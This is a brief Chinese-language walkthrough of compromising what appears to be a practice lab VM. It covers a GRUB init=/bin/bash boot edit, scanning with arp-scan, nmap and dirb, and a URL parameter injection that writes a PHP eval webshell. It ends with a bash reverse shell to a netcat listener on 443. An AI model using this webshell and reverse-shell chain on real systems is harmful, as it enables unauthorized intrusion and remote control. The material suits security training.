1.進行配置,按住shift,在圖一界面按e進去得到圖二
.ro 替換為 rw signie init=/bin/bash
ctrl+x,ip a查看網卡信息,修改配置文件網卡信息
修改為如圖所示內容后按shift+?然后輸入wq點擊回車退出,然后重啟靶機
2.在kali中
arp-scan -l? 掃描靶機ip
3.掃描端口信息
nmap -O 192.168.124.158
4.掃描目錄信息
dirb http://192.168.124.158
5.訪問靶機ip,點擊site
6.進入如下頁面,經過探索之后,點擊buscar,發現頁面的url可以傳參
7.我們嘗試輸入一句話木馬到1.php文件中
http://192.168.50.142/site/busque.php?buscar=echo '<?php eval($_POST["cmd"]);' > 1.php
8.我們訪問當前目錄下的1.php,發現上傳成功
http://192.168.124.158/site/1.php
9.復制1.php文件的絕對路徑,去蟻劍嘗試連接
連接成功!
10.去kali中打開443的監聽
nc -lvvp 443
11.在螞蟻劍中打開終端,輸入反彈shell
bash -c 'bash -i >& /dev/tcp/192.168.124.128/443 0>&1'
?
12.成功在kali中監聽!